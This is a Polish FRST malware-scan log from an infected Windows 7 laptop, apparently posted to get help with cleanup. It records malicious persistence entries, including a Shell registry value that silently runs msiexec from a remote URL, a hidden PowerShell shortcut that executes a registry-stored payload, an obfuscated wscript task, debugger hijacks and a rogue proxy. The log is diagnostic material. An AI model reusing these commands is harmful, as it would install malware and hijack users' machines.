Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 01-05.2019
Uruchomiony przez user (administrator) USER-KOMPUTER (Dell Inc. Inspiron 3542) (02-05-2019 09:00:01)
Uruchomiony z C:\Users\user\Desktop
Załadowane profile: user (Dostępne profile: user)
Platform: Windows 7 Professional Service Pack 1 (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: "C:\Program Files (x86)\Eastness\Application\chrome.exe" "%1")
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesy (filtrowane) =================

(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)

(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Filseclab Corporation -> Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(Huawei Technologies Co., Ltd. -> ) [Brak podpisu cyfrowego] C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Huawei Technologies Co.,Ltd. -> ) C:\ProgramData\MobileBrServ\mbbService.exe
(Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel(R) USB eXtensible Host Controller Drivers -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 3.1 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(NVIDIA Corporation -> ) C:\Users\user\AppData\Local\NVIDIA\NvBackend\Packages\0000da7e\DAO.26250651.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

==================== Rejestr (filtrowane) ===========================

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2398776 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1767760 2016-06-15] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [Brak podpisu cyfrowego]
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9192960 2017-03-30] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1484288 2017-03-30] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1484288 2017-03-30] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => %ProgramFiles%\%SynaProgDir%\SynTPEnh.exe
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 3.1 eXtensible Host Controller Driver\Application\iusb3mon.exe [299520 2016-12-21] (Intel(R) USB eXtensible Host Controller Drivers -> Intel Corporation)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2016-02-03] (Brother Industries, Ltd.) [Brak podpisu cyfrowego]
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.) [Brak podpisu cyfrowego]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Run: [background_fault] => C:\Users\user\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software s.r.o. -> AVAST Software) <==== UWAGA
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Run: [Chromium] => "c:\users\user\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory=Default --restore-last-session
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1SMdQWFUM1OTNSMdk8MTJSNkI1FdRWFUVWMWNWF8E8MH== /q <==== UWAGA
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: E - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {0c381122-ad2b-11e8-a4de-4cbb584b2450} - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {0c38112d-ad2b-11e8-a4de-4cbb584b2450} - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {22447662-0d7b-11e7-92ea-4cbb584b2450} - E:\AutoRun.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {47c20b95-c3bb-11e8-abb6-4cbb584b2450} - F:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {62717a59-ab54-11e7-92b8-4cbb584b2450} - E:\AutoRun.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {9f990d6e-5eda-11e9-afbd-4cbb584b2450} - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {a6f5b12a-54ea-11e8-af04-4cbb584b2450} - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {ccbff85e-2798-11e9-81c5-4cbb584b2450} - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {ccbff866-2798-11e9-81c5-4cbb584b2450} - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [899584 2010-11-21] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.96\Installer\chrmstp.exe [2017-05-03] (Google Inc -> Google Inc.)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [170360 2017-04-01] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [148016 2017-04-01] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation)
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
Startup: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iexplorer.lnk [2019-02-20]
ShortcutAndArgument: iexplorer.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe => -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\mssccfile' -Name t;IEX $t.t;

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {0B84AAC8-5B6E-49AC-8B80-40E16AB32FC3} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [2408496 2019-04-03] (AVG Technologies USA, Inc. -> AVG Technologies CZ, s.r.o.)
Task: {11E8C9A5-AC4C-481B-B63E-BE0326998CFC} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-04-11] (Adobe Inc. -> Adobe)
Task: {22426DDF-860B-4DA5-8FAB-20D09BEBA97F} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_171_pepper.exe [1452600 2019-04-11] (Adobe Inc. -> Adobe)
Task: {29CDBE1B-81AF-4912-ADBE-DBC22D72ADEB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2017-03-16] (Google Inc -> Google Inc.)
Task: {360DB563-BAE3-40FB-9C57-6331F434EE84} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
Task: {4977A195-F738-45C3-965C-EF57D365B924} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [2380088 2019-04-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {4DC92DF3-8107-421B-ADCA-36B2BAFDBF5B} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\Users\user\Desktop\Downloads\esetonlinescanner_plk (1).exe [7668344 2019-01-12] (ESET, spol. s r.o. -> ESET spol. s r.o.)
Task: {6FC838CB-3E2C-4F1E-9447-4AFDA1CE5A69} - System32\Tasks\EOSv3 Scheduler onTime => C:\Users\user\Desktop\Downloads\esetonlinescanner_plk (1).exe [7668344 2019-01-12] (ESET, spol. s r.o. -> ESET spol. s r.o.)
Task: {722535D1-3A59-4CF0-8959-11A69E305466} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
Task: {76641C0C-80E3-426C-B9CC-42DC1A0E2A11} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {A2823A90-B58E-4522-9B41-9B70648660C5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2017-03-16] (Google Inc -> Google Inc.)
Task: {ADAF04DB-C932-40AC-8AE6-D7F35E4F97F1} - System32\Tasks\{10AADE66-C534-454D-A03C-063B83E53749} => C:\Windows\system32\pcalua.exe -a "C:\Users\user\Downloads\Windows Media Player 11 [1].exe" -d C:\Users\user\Downloads
Task: {BFD671CA-1D53-4AF1-A286-130BB21765C0} - System32\Tasks\Chromium lerim => "wscript.exe" "C:\ProgramData\{D8901DF3-52D2-9735-D414-09774E5682B9}\dema.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b44383930314446332d353244322d393733352d443431342d3039373734453536383242397d5c6d616e696e69" "433a5c50726f6772616d446174615c7b44383930314446332d353244322d393733352d (dane wartości zawierają 84 znaków więcej). <==== UWAGA
Task: {C5ED2FE8-B8E2-43DF-B349-F046117F1185} - System32\Tasks\Opera scheduled Autoupdate 1489764596 => C:\Program Files\Opera\launcher.exe [1492568 2019-04-26] (Opera Software AS -> Opera Software)
Task: {DD3FAE7F-7209-4D6C-8E39-EE0BBBC1232F} - System32\Tasks\{6D3767A9-9E41-441F-B89A-DAB6E5E93AB4} => C:\Windows\system32\pcalua.exe -a C:\Users\user\Downloads\wmp11-windowsxp-x86-PL-PL.exe -d C:\Users\user\Downloads
Task: {E33A7C3B-A40C-4A31-8DAA-2633531B5E13} - System32\Tasks\{18BD455D-7CFB-458E-97AF-4531E3CD49C4} => C:\Program Files (x86)\VideoLAN\VLC\vlc.exe [145328 2017-05-24] (VideoLAN -> VideoLAN)
Task: {FA55F0A2-083D-42F8-841A-F12D733065CE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

==================== Internet (filtrowane) ====================

(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)

ProxyEnable: [S-1-5-19] => Proxy [funkcja włączona]
ProxyServer: [S-1-5-19] => 127.0.0.1:8080
ProxyEnable: [S-1-5-20] => Proxy [funkcja włączona]
ProxyServer: [S-1-5-20] => 127.0.0.1:8080
ProxyEnable: [S-1-5-21-1515640166-2867340543-1920175967-1000] => Proxy [funkcja włączona]
ProxyServer: [S-1-5-21-1515640166-2867340543-1920175967-1000] => 127.0.0.1:8080
Hosts: W pliku Hosts jest więcej niż jedno wejście. Sprawdź sekcję Hosts w Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.8.1
Tcpip\..\Interfaces\{6FAE1BC3-C8BF-4D2F-86E3-451058660D46}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{7B590DE9-D3CC-43BA-9BDF-F62F6F6874AA}: [DhcpNameServer] 192.168.8.1
Tcpip\..\Interfaces\{9AE3578D-931C-488F-97DC-E3916685A36A}: [DhcpNameServer] 192.168.8.1
Tcpip\..\Interfaces\{A1872C2A-BADB-48F4-813A-210ACB641FEC}: [DhcpNameServer] 192.168.8.1 192.168.8.1
ManualProxies: 1127.0.0.1:8080

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page =
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL =
SearchScopes: HKU\.DEFAULT -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-1515640166-2867340543-1920175967-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\program files (x86)\mcafee\SITEAD~1\x64\mcieplg.dll => Brak pliku
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\program files (x86)\mcafee\SITEAD~1\mcieplg.dll Brak pliku
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc -> Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc -> Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

Chrome:
=======
CHR res: Zainfekowany resources.pak (search_engine). Przeinstaluj Chrome. <==== UWAGA
CHR HomePage: Default -> hxxps://www.google.com/
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/index.php?z=54320939c4d150bfeed4b3cg7zct2weqag0c7ofedc&q={searchTerms}
CHR DefaultSearchKeyword: Default -> mystarting123
CHR Profile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default [2019-04-30]
CHR Extension: (Prezentacje) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-03-28]
CHR Extension: (Dokumenty) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-03-28]
CHR Extension: (Dysk Google) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-03-16]
CHR Extension: (YouTube) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-16]
CHR Extension: (Adobe Acrobat) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-03-28]
CHR Extension: (Arkusze) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-03-28]
CHR Extension: (Dokumenty Google offline) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-03-28]
CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-03-28]
CHR Extension: (tTab) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oonbcpdabjcggcklopgbdagbfnkhbgbe [2019-03-28]
CHR Extension: (Gmail) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-03-16]
CHR Extension: (Chrome Media Router) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-03-28]
CHR HKLM\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx

==================== Usługi (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R2 3B1FB597; C:\ProgramData\3B1FB597\DCB5EEC9.dll [617984 2019-03-25] () [Brak podpisu cyfrowego]
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [Brak podpisu cyfrowego]
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1165368 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2018-12-12] (Huawei Technologies Co., Ltd. -> ) [Brak podpisu cyfrowego]
S2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [344184 2017-01-13] (Intel Corporation - pGFX -> Intel Corporation)
R2 Mobile Broadband HL Service; C:\ProgramData\MobileBrServ\mbbservice.exe [242264 2015-09-23] (Huawei Technologies Co.,Ltd. -> )
S2 NPASRE; C:\Users\user\AppData\Local\NPASRE\Snare.dll [830464 2017-05-23] () [Brak podpisu cyfrowego] <==== UWAGA
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1881144 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3634232 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2522680 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [324608 2017-03-30] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
S4 SNAREA; C:\Users\user\AppData\Local\SNAREA\Snare.dll [826368 2017-05-23] () [Brak podpisu cyfrowego] <==== UWAGA
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation -> Filseclab Corporation Limited)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [254552 2016-12-07] (Synaptics Incorporated -> Synaptics Incorporated)
R2 TermService; C:\ProgramData\smQWqI6f.492\cR8rpo62.58U.dll [115712 2019-03-28] () [Brak podpisu cyfrowego]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-06-10] (Microsoft Windows -> Microsoft Corporation)
S2 avast; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /svc [X]
S3 avastm; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /medsvc [X]
S2 McAfee WebAdvisor; "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe" [X]
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000

===================== Sterowniki (filtrowane) ======================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R3 cykbfltrService; C:\Windows\System32\DRIVERS\cykbfltr.sys [19968 2013-09-13] (Microsoft Windows Hardware Compatibility Publisher -> Cypress Semiconductor, Inc.)
S3 ew_usbccgpfilter; C:\Windows\System32\DRIVERS\ew_usbccgpfilter.sys [18944 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [31712 2016-08-29] (Intel(R) Rapid Storage Technology -> Intel Corporation)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [200272 2017-02-14] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [28216 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [56384 2016-04-14] (NVIDIA Corporation -> NVIDIA Corporation)
U3 aswbdisk; Brak ImagePath
U3 avgbdisk; Brak ImagePath
S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== UWAGA
S3 mfesapsn; \??\C:\Program Files\McAfee\WebAdvisor\mfesapsn.sys [X]

==================== NetSvcs (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

==================== Jeden miesiąc (utworzone) ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2019-05-02 09:00 - 2019-05-02 09:02 - 000025194 _____ C:\Users\user\Desktop\FRST.txt
2019-05-02 08:59 - 2019-05-02 09:00 - 000000000 ____D C:\FRST
2019-05-02 08:59 - 2019-05-02 08:55 - 002430464 _____ (Farbar) C:\Users\user\Desktop\FRST64.exe
2019-04-30 15:02 - 2019-04-30 15:02 - 000000000 ____D C:\Program Files (x86)\ESET
2019-04-30 15:02 - 2015-04-13 20:16 - 002347384 _____ (ESET) C:\Users\user\Desktop\esetsmartinstaller_plk.exe
2019-04-27 14:41 - 2019-04-27 14:56 - 000000000 ____D C:\Users\user\Desktop\inne
2019-04-16 16:26 - 2019-04-16 16:26 - 377634692 _____ C:\Windows\MEMORY.DMP
2019-04-16 16:26 - 2019-04-16 16:26 - 000307032 _____ C:\Windows\Minidump\041619-13197-01.dmp
2019-04-13 15:13 - 2019-04-13 15:13 - 000001005 _____ C:\Users\Public\Desktop\HiSuite.lnk
2019-04-13 15:13 - 2019-04-13 15:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HiSuite
2019-04-13 15:12 - 2019-04-13 15:13 - 000000000 ____D C:\Users\user\AppData\Local\HiSuite
2019-04-13 15:12 - 2019-04-13 15:13 - 000000000 ____D C:\Program Files (x86)\HiSuite
2019-04-13 15:12 - 2018-12-12 12:32 - 000287232 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_quusbnet.sys
2019-04-13 15:12 - 2018-12-12 12:32 - 000226560 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_quusbmdm.sys
